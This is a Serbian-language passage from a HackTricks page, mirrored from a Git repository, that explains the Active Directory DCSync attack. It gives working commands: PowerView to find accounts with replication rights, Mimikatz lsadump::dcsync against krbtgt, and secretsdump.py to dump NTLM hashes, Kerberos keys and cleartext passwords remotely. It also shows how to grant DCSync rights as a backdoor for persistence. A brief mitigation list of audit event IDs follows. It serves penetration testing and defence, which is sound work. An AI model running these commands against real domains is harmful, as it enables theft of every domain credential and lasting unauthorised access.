maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity
hacktricks/src/windows-hardening/active-directory-methodology/dcsync.md

65 lines
3.6 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# DCSync
{{#include ../../banners/hacktricks-training.md}}
## DCSync
Dozvola **DCSync** podrazumeva da imate ove dozvole nad samim domenom: **DS-Replication-Get-Changes**, **Replicating Directory Changes All** i **Replicating Directory Changes In Filtered Set**.
**Važne napomene o DCSync:**
- **DCSync napad simulira ponašanje Kontrolera Domena i traži od drugih Kontrolera Domena da repliciraju informacije** koristeći Directory Replication Service Remote Protocol (MS-DRSR). Pošto je MS-DRSR validna i neophodna funkcija Active Directory-a, ne može se isključiti ili onemogućiti.
- Po defaultu, samo grupe **Domain Admins, Enterprise Admins, Administrators i Domain Controllers** imaju potrebne privilegije.
- Ako su lozinke bilo kojih naloga sačuvane sa reverzibilnom enkripcijom, dostupna je opcija u Mimikatz-u da vrati lozinku u čistom tekstu.
### Enumeration
Proverite ko ima ove dozvole koristeći `powerview`:
```bash
Get-ObjectAcl -DistinguishedName "dc=dollarcorp,dc=moneycorp,dc=local" -ResolveGUIDs | ?{($_.ObjectType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll') -or ($_.ActiveDirectoryRights -match 'WriteDacl')}
```
### Eksploatiši lokalno
```bash
Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\krbtgt"'
```
### Eksploatiši na daljinu
```bash
secretsdump.py -just-dc <user>:<password>@<ipaddress> -outputfile dcsync_hashes
[-just-dc-user <USERNAME>] #To get only of that user
[-pwd-last-set] #To see when each account's password was last changed
[-history] #To dump password history, may be helpful for offline password cracking
```
`-just-dc` generiše 3 fajla:
- jedan sa **NTLM hash-ovima**
- jedan sa **Kerberos ključevima**
- jedan sa lozinkama u čistom tekstu iz NTDS za bilo koje naloge koji imaju [**reverzibilnu enkripciju**](https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption) omogućenu. Možete dobiti korisnike sa reverzibilnom enkripcijom pomoću
```bash
Get-DomainUser -Identity * | ? {$_.useraccountcontrol -like '*ENCRYPTED_TEXT_PWD_ALLOWED*'} |select samaccountname,useraccountcontrol
```
### Persistencija
Ako ste administrator domena, možete dodeliti ova prava bilo kojem korisniku uz pomoć `powerview`:
```bash
Add-ObjectAcl -TargetDistinguishedName "dc=dollarcorp,dc=moneycorp,dc=local" -PrincipalSamAccountName username -Rights DCSync -Verbose
```
Zatim, možete **proveriti da li je korisniku ispravno dodeljeno** 3 privilegije tražeći ih u izlazu (trebalo bi da možete da vidite imena privilegija unutar polja "ObjectType"):
```bash
Get-ObjectAcl -DistinguishedName "dc=dollarcorp,dc=moneycorp,dc=local" -ResolveGUIDs | ?{$_.IdentityReference -match "student114"}
```
### Ublažavanje
- Security Event ID 4662 (Audit Policy for object must be enabled) Operacija je izvršena na objektu
- Security Event ID 5136 (Audit Policy for object must be enabled) Objekt usluge direktorijuma je izmenjen
- Security Event ID 4670 (Audit Policy for object must be enabled) Dozvole na objektu su promenjene
- AD ACL Scanner - Kreirajte i uporedite izveštaje o ACL-ima. [https://github.com/canix1/ADACLScanner](https://github.com/canix1/ADACLScanner)
## Reference
- [https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/dump-password-hashes-from-domain-controller-with-dcsync](https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/dump-password-hashes-from-domain-controller-with-dcsync)
- [https://yojimbosecurity.ninja/dcsync/](https://yojimbosecurity.ninja/dcsync/)
{{#include ../../banners/hacktricks-training.md}}
Reference in New Issue View Git Blame Copy Permalink